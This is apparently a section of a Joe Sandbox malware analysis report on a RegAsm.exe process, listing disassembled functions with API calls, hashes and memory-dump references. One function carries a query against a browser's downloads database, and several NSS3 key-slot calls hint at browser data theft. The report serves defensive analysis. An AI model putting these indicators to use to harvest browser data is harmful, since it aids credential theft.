API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 2ae9ba0cee66343c52d9fc955df88dc4dd6c3b3395c300f33af8140f87425a79
Instruction ID: 2e73f7a30782e04c77b0d0bbbd8a1792677eadce27ce163419108753ef3d4ac4
Opcode Fuzzy Hash: 2ae9ba0cee66343c52d9fc955df88dc4dd6c3b3395c300f33af8140f87425a79
Instruction Fuzzy Hash: F8A1D0757411408BEB08AF24DA9976E377DBF4330CF1A052DE4164BA40DB3AE856DB93

Function 6CA51E70 Relevance: 7.7, APIs: 5, Instructions: 207COMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3(?), ref: 6CA51ECC

Part of subcall function 6CAF9090: TlsGetValue.KERNEL32 ref: 6CAF90AB
Part of subcall function 6CAF9090: TlsGetValue.KERNEL32 ref: 6CAF90C9
Part of subcall function 6CAF9090: EnterCriticalSection.KERNEL32 ref: 6CAF90E5
Part of subcall function 6CAF9090: TlsGetValue.KERNEL32 ref: 6CAF9116
Part of subcall function 6CAF9090: LeaveCriticalSection.KERNEL32 ref: 6CAF913F

TlsGetValue.KERNEL32 ref: 6CA51EDF
EnterCriticalSection.KERNEL32(?), ref: 6CA51EEF
PR_ExitMonitor.NSS3(?), ref: 6CA51F37
PR_Unlock.NSS3(?), ref: 6CA51F44

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Value$CriticalEnterSection$Monitor$ExitLeaveUnlock
String ID:
API String ID: 3539092540-0
Opcode ID: 1adb6e06ca4c995586d13c9c7b14a26b790d27dbd1f24b56009899509695e952
Instruction ID: 88257edb8cd43f964d9af8c1526e988203a9cb0292be11690a9a50f7a7491ae1
Opcode Fuzzy Hash: 1adb6e06ca4c995586d13c9c7b14a26b790d27dbd1f24b56009899509695e952
Instruction Fuzzy Hash: DD71C1719043019FD700CF24D940A6AB7F5FF89358F588929E99993B11E732F9ACCB92

Function 004092A7 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 192stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

lstrlenA.KERNEL32(?), ref: 004094AB
lstrlenA.KERNEL32(?), ref: 004094C6

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Strings

Downloads, xrefs: 004092D1
SELECT target_path, tab_url from downloads, xrefs: 004093B9
Downloads, xrefs: 00409328

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID: Downloads$Downloads$SELECT target_path, tab_url from downloads
API String ID: 2500673778-2241552939
Opcode ID: 7ced90a649ff221f7bde020ab2f4116feee36ff5ac8d8cfbed5ae13c3b06d1e2
Instruction ID: 7fac0f62cf2577a5a8d57f6ab71485126a571a4460cd7af8d0bbaabf91a59925
Opcode Fuzzy Hash: 7ced90a649ff221f7bde020ab2f4116feee36ff5ac8d8cfbed5ae13c3b06d1e2
Instruction Fuzzy Hash: EA712D71A40119ABCF01FFA6DE469DDB775AF04309F610026F500B70A1DBB8AE898B98

Function 6CADDD70 Relevance: 7.7, APIs: 5, Instructions: 179COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CADDD8C
LeaveCriticalSection.KERNEL32(00000000), ref: 6CADDDB4
LeaveCriticalSection.KERNEL32(00000000), ref: 6CADDE1B
ReleaseSemaphore.KERNEL32(?,00000001,00000000), ref: 6CADDE77

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: CriticalLeaveSection$ReleaseSemaphoreValue
String ID:
API String ID: 2700453212-0
Opcode ID: 82846ac1eb2017a422c9d5da4be855bf50260792feefc85de6cb38efa0a36c52
Instruction ID: 61db88e690ba941b14e06c34231e8c5f2b896a06ac43aee13dc64612ec7e4974
Opcode Fuzzy Hash: 82846ac1eb2017a422c9d5da4be855bf50260792feefc85de6cb38efa0a36c52
Instruction Fuzzy Hash: E9716571E01315CFDB10CF9AC580A99BBB4BF49718F2A816DD9596B702DB30B985CFA0

Function 6CA5BE90 Relevance: 7.6, APIs: 5, Instructions: 141COMMON

Download Yara Rule

APIs

SEC_ASN1EncodeItem_Util.NSS3(00000000,00000000,?,?), ref: 6CA5BF06
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CA5BF56
PR_SetError.NSS3(FFFFE005,00000000,?,?,6CA39F71,?,?,00000000), ref: 6CA5BF7F
CERT_DestroyCertificate.NSS3(00000000), ref: 6CA5BFA9
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CA5C014

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Item_Util$Zfree$CertificateDestroyEncodeError
String ID:
API String ID: 3689625208-0
Opcode ID: 10d4e9a8fcd12466bf161aec7a751d12b6acd24c33d86c0dda6bb918f6219650
Instruction ID: d32e99a85f0666b33424a357218a5ad4fcc424755f010d2f69aa7591c92d021a
Opcode Fuzzy Hash: 10d4e9a8fcd12466bf161aec7a751d12b6acd24c33d86c0dda6bb918f6219650
Instruction Fuzzy Hash: 8341FD71A012059BEB00CE65ED40BBA73B5AF4420DF958228EC15D7B41F732E99DCBD1

Function 6CA2EDE0 Relevance: 7.6, APIs: 5, Instructions: 97COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CA2EDFD
calloc.MOZGLUE(00000001,00000000), ref: 6CA2EE64
PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6CA2EECC
memcpy.VCRUNTIME140(00000000,?,?), ref: 6CA2EEEB
free.MOZGLUE(?), ref: 6CA2EEF6

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: ErrorValuecallocfreememcpy
String ID:
API String ID: 3833505462-0
Opcode ID: 38c5bb1da9573986704eccf9cc5e6a1969cf53109e475ba8257d664ff101464f
Instruction ID: 291d6c0f04100176a1c04b260ce60f1d31a6a27c0c4923b293b031baa390524d
Opcode Fuzzy Hash: 38c5bb1da9573986704eccf9cc5e6a1969cf53109e475ba8257d664ff101464f
Instruction Fuzzy Hash: A63109B1A00260ABD7209F38CD447667BF4FB46316F1C0629E85A87B50D739E8D4CBD1

Function 6CA71EA0 Relevance: 7.6, APIs: 5, Instructions: 91COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE002,00000000,?,00000001,?,?,6CA56295,?,00000000,00000000,00000001,6CA72653,?), ref: 6CA71ECB

Part of subcall function 6CADC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CADC2BF

TlsGetValue.KERNEL32(?,00000001,?,?,6CA56295,?,00000000,00000000,00000001,6CA72653,?), ref: 6CA71EF1
EnterCriticalSection.KERNEL32(?), ref: 6CA71F01
PR_SetError.NSS3(00000000,00000000), ref: 6CA71F39

Part of subcall function 6CA7FE20: TlsGetValue.KERNEL32(6CA55ADC,?,00000000,00000001,?,?,00000000,?,6CA4BA55,?,?), ref: 6CA7FE4B
Part of subcall function 6CA7FE20: EnterCriticalSection.KERNEL32(78831D90,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CA7FE5F

PR_Unlock.NSS3(?), ref: 6CA71F67

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Value$CriticalEnterErrorSection$Unlock
String ID:
API String ID: 704537481-0
Opcode ID: 096fea4b7de5243c116907fd60e6d3650e289d55ec4f769cdf683db7fd07fb76
Instruction ID: ce97a5ab6770c4e68de8b2720efc9002b5d9073bc02ecec5bec354221aeeea6b
Opcode Fuzzy Hash: 096fea4b7de5243c116907fd60e6d3650e289d55ec4f769cdf683db7fd07fb76
Instruction Fuzzy Hash: 6321D579A00104ABDB20AF29DC55AAA37B9BF45368F594125FE0C87711E730E994C6F0

Function 6CA31DD0 Relevance: 7.6, APIs: 5, Instructions: 81timeCOMMON

Download Yara Rule

APIs

DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6CA31E0B
DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6CA31E24
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA31E3B
PR_SetError.NSS3(FFFFE00B,00000000), ref: 6CA31E8A
PR_SetError.NSS3(FFFFE00B,00000000), ref: 6CA31EAD

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Error$Choice_DecodeTimeUtil
String ID:
API String ID: 1529734605-0
Opcode ID: 7b00c1f8924841765316af8894daffcf97bafa6e8c2d2764f697a70861832ff7
Instruction ID: 034544ab33a9145ca7b3ce0fb739d18dbdf32b9f355a57be87db40fd01e5a210
Opcode Fuzzy Hash: 7b00c1f8924841765316af8894daffcf97bafa6e8c2d2764f697a70861832ff7
Instruction Fuzzy Hash: 2C213672E04320ABD7009E68DC51BBB73A49B84368F284638FE5D977C0E731D98887D2

Function 6CA8BE60 Relevance: 7.6, APIs: 5, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6CA3E708,00000000,00000000,00000004,00000000), ref: 6CA8BE6A

Part of subcall function 6CA90840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CA908B4

SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6CA404DC,?), ref: 6CA8BE7E

Part of subcall function 6CA8FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CA88D2D,?,00000000,?), ref: 6CA8FB85
Part of subcall function 6CA8FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CA8FBB1

SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6CA8BEC2
PR_SetError.NSS3(FFFFE006,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6CA404DC,?,?), ref: 6CA8BED7
SECITEM_AllocItem_Util.NSS3(?,?,00000002,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6CA8BEEB

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Util$Item_$CopyError$AllocAlloc_ArenaFindTag_memcpy
String ID:
API String ID: 1367977078-0
Opcode ID: f1b67ade3d5cf8085e025b4fa9cc4ed7ec3452d35d0e67ef7d4996e844efd303
Instruction ID: 31ce77c16e82efb2b0443b024c150b3fdb5d3eec1ed10ea1d632d25bd0f78742
Opcode Fuzzy Hash: f1b67ade3d5cf8085e025b4fa9cc4ed7ec3452d35d0e67ef7d4996e844efd303
Instruction Fuzzy Hash: 64110476A062066BE700D96ABD84F6B736D9B40B58F084225FE0596B52E731DC8887F1

Function 6CA3AD90 Relevance: 7.6, APIs: 5, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(00000000,?,6CA33FFF,00000000,?,?,?,?,?,6CA31A1C,00000000,00000000), ref: 6CA3ADA7

Part of subcall function 6CA914C0: TlsGetValue.KERNEL32 ref: 6CA914E0
Part of subcall function 6CA914C0: EnterCriticalSection.KERNEL32 ref: 6CA914F5
Part of subcall function 6CA914C0: PR_Unlock.NSS3 ref: 6CA9150D

PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6CA33FFF,00000000,?,?,?,?,?,6CA31A1C,00000000,00000000), ref: 6CA3ADB4

Part of subcall function 6CA910C0: TlsGetValue.KERNEL32(?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA910F3
Part of subcall function 6CA910C0: EnterCriticalSection.KERNEL32(?,?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA9110C
Part of subcall function 6CA910C0: PL_ArenaAllocate.NSS3(?,?,?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA91141
Part of subcall function 6CA910C0: PR_Unlock.NSS3(?,?,?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA91182
Part of subcall function 6CA910C0: TlsGetValue.KERNEL32(?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA9119C

SECITEM_CopyItem_Util.NSS3(00000000,?,6CA33FFF,?,?,?,?,6CA33FFF,00000000,?,?,?,?,?,6CA31A1C,00000000), ref: 6CA3ADD5

Part of subcall function 6CA8FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CA88D2D,?,00000000,?), ref: 6CA8FB85
Part of subcall function 6CA8FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CA8FBB1

SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6CB594B0,?,?,?,?,?,?,?,?,6CA33FFF,00000000,?), ref: 6CA3ADEC

Part of subcall function 6CA8B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CB618D0,?), ref: 6CA8B095

PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6CA33FFF), ref: 6CA3AE3C

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
String ID:
API String ID: 2372449006-0
Opcode ID: ab11819c3e98ee3694c89b8f07f84b6e9f1609dabc8771ca082870355e43bb4e
Instruction ID: 9e16920fc74e5e9dcc6ad0e395ed6b8ccba3ae41df8f890e22d7ac7db06ae5a1
Opcode Fuzzy Hash: ab11819c3e98ee3694c89b8f07f84b6e9f1609dabc8771ca082870355e43bb4e
Instruction Fuzzy Hash: 9C115671E002345BEB109BA5AC11BBF73FC9F9524CF044229EC19C6781FB20E9DD82A2

Function 6CA58E80 Relevance: 7.6, APIs: 5, Instructions: 71COMMON

Download Yara Rule

APIs

PK11_GetInternalKeySlot.NSS3(?,?,?,6CA72E62,?,?,?,?,?,?,?,00000000,?,?,?,6CA44F1C), ref: 6CA58EA2

Part of subcall function 6CA7F820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6CA7F854
Part of subcall function 6CA7F820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6CA7F868
Part of subcall function 6CA7F820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6CA7F882
Part of subcall function 6CA7F820: free.MOZGLUE(04C483FF,?,?), ref: 6CA7F889
Part of subcall function 6CA7F820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6CA7F8A4
Part of subcall function 6CA7F820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6CA7F8AB
Part of subcall function 6CA7F820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6CA7F8C9
Part of subcall function 6CA7F820: free.MOZGLUE(280F10EC,?,?), ref: 6CA7F8D0

PK11_IsLoggedIn.NSS3(?,?,?,6CA72E62,?,?,?,?,?,?,?,00000000,?,?,?,6CA44F1C), ref: 6CA58EC3
TlsGetValue.KERNEL32(?,?,?,6CA72E62,?,?,?,?,?,?,?,00000000,?,?,?,6CA44F1C), ref: 6CA58EDC
EnterCriticalSection.KERNEL32(?,?,?,?,6CA72E62,?,?,?,?,?,?,?,00000000,?,?), ref: 6CA58EF1
PR_Unlock.NSS3 ref: 6CA58F20

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: free$CriticalSection$Delete$K11_$EnterInternalLoggedSlotUnlockValue
String ID:
API String ID: 1978757487-0
Opcode ID: eb41dc6cb2395dfb121ce14d6a0ee2d92524edd68184224eb906b359b4e5c2d6
Instruction ID: d1d7c160d185de4ac5655d1a0486e889525f5ecfb0f4fc8423d5c2438d536c10
Opcode Fuzzy Hash: eb41dc6cb2395dfb121ce14d6a0ee2d92524edd68184224eb906b359b4e5c2d6
Instruction Fuzzy Hash: D821ADB0A096059FC700AF28C584199BBF0FF49318F45856EEC989BB40D730E8A8CBD2

Function 00425713 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.MSVCRT ref: 00425721
_free.LIBCMT ref: 00425734

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _freemalloc
String ID:
API String ID: 3576935931-0
Opcode ID: feda3816294fd9af8db34316e038ce1953c349d56468ddbca55d0205ef3a299f
Instruction ID: b76dc663818b464284d97c71afdab2e33c7188303a79513cbdb4af8dfc28d3f2
Opcode Fuzzy Hash: feda3816294fd9af8db34316e038ce1953c349d56468ddbca55d0205ef3a299f
Instruction Fuzzy Hash: CB112732B40A31EBCF216F79BC0575A37A5AF803B5F60403FF8498A250DE7C8980969C

Function 6CA5CD80 Relevance: 7.6, APIs: 5, Instructions: 60COMMON

Download Yara Rule

APIs

Part of subcall function 6CA71E10: TlsGetValue.KERNEL32 ref: 6CA71E36
Part of subcall function 6CA71E10: EnterCriticalSection.KERNEL32(?,?,?,6CA4B1EE,2404110F,?,?), ref: 6CA71E4B
Part of subcall function 6CA71E10: PR_Unlock.NSS3 ref: 6CA71E76

free.MOZGLUE(?,6CA5D079,00000000,00000001), ref: 6CA5CDA5
PK11_FreeSymKey.NSS3(?,6CA5D079,00000000,00000001), ref: 6CA5CDB6
SECITEM_ZfreeItem_Util.NSS3(?,00000001,6CA5D079,00000000,00000001), ref: 6CA5CDCF
DeleteCriticalSection.KERNEL32(?,6CA5D079,00000000,00000001), ref: 6CA5CDE2
free.MOZGLUE(?), ref: 6CA5CDE9

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
String ID:
API String ID: 1720798025-0
Opcode ID: 2e7323399e4677c087816e5222c2d96b2590df1680ef7e54137ba6cbb944e27d
Instruction ID: b06cfafc4b54bc170f78dccfa9905642cfe066a5186cecfff5b83b60f02cfacd
Opcode Fuzzy Hash: 2e7323399e4677c087816e5222c2d96b2590df1680ef7e54137ba6cbb944e27d
Instruction Fuzzy Hash: 2211E0B2B01105ABDB00AF64EC84A96B73CFB0826C7588121E918D3E05E336E4B8C7E0

Function 6CAC2CC0 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

Part of subcall function 6CAC5B40: PR_GetIdentitiesLayer.NSS3 ref: 6CAC5B56

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CAC2CEC

